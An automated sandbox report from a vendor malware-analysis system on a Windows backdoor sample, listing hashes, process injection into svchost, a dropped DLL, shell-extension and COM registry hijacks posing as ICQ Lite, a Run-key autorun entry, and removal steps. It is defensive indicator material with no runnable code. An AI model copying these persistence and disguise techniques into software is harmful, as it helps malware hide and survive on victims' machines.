Backdoor.Win32.Farfli_8003e1644b
HEUR:Trojan.Win32.Generic (Kaspersky), Packer.Morphine.B (B) (Emsisoft), Packer.Morphine.B (AdAware), Backdoor.Win32.Farfli.FD, GenericEmailWorm.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Banker, Trojan, Backdoor, Worm, EmailWorm
This description was generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.
MD5: 8003e1644b2448254cad8671be23fcb6
SHA1: 5e3ed2c90caf3a5c632a4603278814bacdd8e380
SHA256: 0a80910bd7d7807d9d795a85f759748c8d9140b1129c1dc6650131e697b3cddf
SSDeep: 1536:nQKeJ5YQx8k fmTZDZpYuu7Z6BicRw2zvbu/1AQftI3w103CQUI:ngnxsfGDRuljcLmAuI3K
Size: 74241 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: Morphinev27, UPolyXv05_v6
Company: no certificate found
Created at: 1998-09-28 14:39:39
Analyzed on: WindowsXP SP3 32-bit
Summary:
Backdoor: malware that enables remote control of the victim's machine.
Payload
| Behaviour | Description |
|---|---|
| EmailWorm | The worm can send e-mails. |
Process activity
The Backdoor creates the following process(es):
%original file name%.exe:1316
The Backdoor injects its code into the following process(es):
mdmi386.exe:1064
svchost.exe:1588
File activity
The process mdmi386.exe:1064 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%System%\AUHook.dll (51 bytes)
%WinDir%\win.ini (106 bytes)
The process %original file name%.exe:1316 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%System%\mdmi386.exe (601 bytes)
Registry activity
The process mdmi386.exe:1064 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\DB\06]
"53" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\4C\30\07]
"93" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\30\6E\05]
"F1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5E\3F\08]
"7A" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3E\60\06]
"C2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\53\0B\07]
"E8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3B\A3\06]
"72" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5E\B6\08]
"25" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\54\F0\07]
"F4" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\27\79\05]
"55" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\53\8E\07]
"C0" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5A\AD\08]
"29" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\1E\61\04]
"95" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\4A\3E\07]
"46" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\70\7B\09]
"28" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\74\03\09]
"3e" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\63\83\08]
"89" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\30\77\05]
"F6" = "1"
[HKCR\*\shellex\ContextMenuHandlers\icqlite]
"(Default)" = "{77770022-0D68-4D14-BF25-6747ACFA95DE}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3C\AE\06]
"A2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\43\47\07]
"19" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\7B\E0\09]
"57" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\55\AD\08]
"12" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\98\06]
"52" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\44\B5\07]
"1a" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\54\AA\07]
"E4" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\29\E2\05]
"7E" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3D\18\06]
"C7" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5A\D7\08]
"2d" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\47\4C\07]
"52" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\29\52\05]
"6E" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\53\0E\07]
"EC" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\4C\FF\07]
"83" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\29\5B\05]
"70" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5B\C8\08]
"31" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\4B\DB\07]
"7D" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\77\05]
"DB" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\24\44\05]
"13" = "1"
[HKCR\CLSID\{A4C110AE-0291-F12A-2920-F0E455440770}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\37\02\06]
"59" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\24\56\05]
"1a" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\42\20\06]
"C3" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\14\06]
"4c" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\37\58\06]
"63" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\1D\D0\04]
"95" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\7A\22\09]
"67" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\pi]
"1~" = "573571897"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\6E\5C\09]
"01" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\35\DF\06]
"48" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\B9\5D\0B]
"74" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\22\9A\04]
"F4" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\F3\06]
"5b" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\EA\65\0C]
"F0" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\50\34\07]
"ab" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\7C\0E\09]
"bc" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\49\BC\07]
"31" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\43\A7\07]
"19" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\7E\F5\09]
"aa" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\41\C7\06]
"F8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3B\0F\06]
"83" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\44\E9\07]
"20" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\63\C9\08]
"00" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5D\9A\08]
"56" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\94\6C\0A]
"7C" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\65\FA\08]
"C7" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\data\pa]
"~01" = "1#ByR0NRZDEFUHSQhFADoaex9y"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\5C\05]
"DB" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\57\E1\07]
"80" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\49\14\07]
"38" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\42\12\06]
"F1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\44\05]
"ce" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3B\E2\06]
"A2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3E\39\06]
"C3" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\73\C2\09]
"31" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\tm\C:]
"(Default)" = "153457"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5A\F4\08]
"43" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\64\90\08]
"6D" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\1F\0C\04]
"C7" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3D\87\06]
"C6" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\30\20\05]
"E3" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\56\B2\08]
"06" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\37\73\06]
"62" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\MRU]
"00" = "pa\~01"
"01" = "pi\1~"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\61\FE\08]
"8E" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5C\DD\08]
"64" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\29\6C\05]
"73" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\30\75\05]
"F0" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\23\84\05]
"05" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\89\05]
"D8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\35\15\06]
"33" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2A\55\05]
"85" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\MRU]
"!2" = "1"
"!1" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\35\BD\06]
"06" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\58\08\07]
"FB" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\95\6D\0A]
"0A" = "1"
[HKCR\CLSID\{A4C110AE-0291-F12A-2920-F0E455440770}\InprocServer32]
"(Default)" = "%System%\AUHook.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2A\59\05]
"8D" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\90\E0\0A]
"86" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 9B A0 56 59 F6 35 ED A3 63 73 46 7E 34 33 D7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5A\45\08]
"21" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\30\E2\05]
"E2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5C\8C\08]
"26" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\39\38\06]
"44" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"{77770022-0D68-4D14-BF25-6747ACFA95DE}" = "Shell Extensions for ICQ Lite"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\8E\CC\0A]
"2e" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\23\A7\05]
"0A" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\82\06]
"4d" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\EA\2A\0C]
"F7" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3B\D3\06]
"97" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\71\06]
"53" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc]
"counter" = "1"
[HKCR\CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\74\55\09]
"0C" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\59\78\08]
"12" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\14\CE\03]
"B6" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\AC\DA\0B]
"0E" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\22\C0\04]
"F7" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\24\D5\05]
"23" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\70\41\09]
"2b" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\45\7D\07]
"26" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5D\49\08]
"78" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\98\9E\11]
"4c" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\22\66\04]
"C1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\AB\8B\0B]
"6F" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\22\D8\04]
"F8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\71\50\09]
"27" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\F8\05]
"eb" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\D9\05]
"E3" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\data\pi]
"1~" = "1#cFMDSmlYe29vb29vb29vb29vb2tra2tONJI6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5C\B8\08]
"58" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\29\50\05]
"74" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\35\C1\06]
"3a" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\66\A6\08]
"E6" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\23\60\05]
"02" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2A\6E\05]
"91" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\18\C0\04]
"24" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\BE\94\0B]
"E2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\0D\A5\0E]
"09" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\tm]
"pi" = "154537"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\CB\05]
"E2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3B\EE\06]
"98" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\32\53\06]
"05" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\27\FD\05]
"57" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\50\29\07]
"86" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\96\35\0A]
"7F" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\48\CF\07]
"3d" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\85\20\0A]
"1f" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2E\BB\05]
"B6" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2E\29\05]
"bf" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2B\E8\05]
"98" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\4D\61\07]
"B2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\8A\4C\0A]
"13" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3D\F3\06]
"cf" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5C\F5\08]
"63" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\6A\06]
"3a" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\54\29\07]
"F8" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
"AUHook" = "{BCBCD383-3E06-11D3-91A9-00C04F68105C}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\14\FB\03]
"ce" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\22\89\04]
"E0" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\84\7C\0A]
"1a" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\83\24\09]
"E6" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5A\2A\08]
"26" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3E\A5\06]
"ca" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\67\6C\08]
"EA" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\CE\2D\0C]
"53" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\23\76\05]
"11" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\24\41\05]
"11" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\A8\54\0B]
"6E" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3D\B1\06]
"D5" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3C\24\06]
"B2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3C\54\06]
"64" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\35\C2\06]
"40" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\71\02\09]
"46" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\70\6B\09]
"46" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\58\A2\08]
"1d" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3D\45\06]
"af" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\50\EB\07]
"8E" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\71\A2\09]
"0D" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\1E\23\04]
"99" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\6B\1F\08]
"A8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\43\1F\06]
"D9" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\50\19\07]
"77" = "1"
[HKCR\Directory\shellex\ContextMenuHandlers\icqlite]
"(Default)" = "{77770022-0D68-4D14-BF25-6747ACFA95DE}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2E\6C\05]
"B8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\8B\B6\0A]
"1c" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\28\E9\05]
"6D" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\56\AF\08]
"2a" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\21\E7\04]
"C2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\46\11\07]
"42" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\34\34\06]
"06" = "1"
[HKCR\CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}\InprocServer32]
"(Default)" = "AUHook.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\6F\4C\09]
"29" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\B4\4F\0B]
"6D" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\44\ED\07]
"1c" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\59\AE\08]
"1f" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5C\3C\08]
"48" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\45\71\07]
"3b" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\52\B6\07]
"cc" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\FF\06]
"62" = "1"
[HKCR\CLSID\{BCBCD383-3E06-11D3-91A9-00C04F68105C}\InprocServer32]
"(Default)" = "%System%\AUHook.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\53\2C\07]
"de" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3E\65\06]
"D0" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3E\1C\06]
"D8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\1F\84\04]
"D3" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\60\8C\08]
"37" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\1B\51\03]
"dd" = "1"
To run automatically each time Windows boots, the Backdoor adds the following link to its file in the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Machine Debug Manager" = "mdmi386.exe"
The process %original file name%.exe:1316 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 E5 3B 0A 96 A2 DD 6B 03 BB 9B 13 35 7D C6 4B"
Dropped PE files
| MD5 | File path |
|---|---|
| 69cd8f35a41fa1a5c99ee49d9a87bede | c:\WINDOWS\system32\AUHook.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 229376 | 72192 | 5.54111 | 468df37f266b084a63d51d03dbfac71c |
| .idata | 233472 | 4096 | 512 | 0.705801 | 0f0355ba200199275c0ce3814e0ccd62 |
| .tls | 237568 | 4096 | 512 | 0.147711 | 3ce56d9e00101a6b28ba1cc0cce53e97 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
No activity has been detected.
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Web Traffic was not found.
mdmi386.exe_1064_rwx_003B1000_0000C000:
mdmi386.exe_1064_rwx_00401000_00012000:
mdmi386.exe_1064_rwx_00B30000_00028000:
mdmi386.exe_1064_rwx_13140000_00038000:
svchost.exe_1588:
svchost.exe_1588_rwx_13140000_00038000:
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1316
- Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
%System%\AUHook.dll (51 bytes)
%WinDir%\win.ini (106 bytes)
%System%\mdmi386.exe (601 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Machine Debug Manager" = "mdmi386.exe"
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.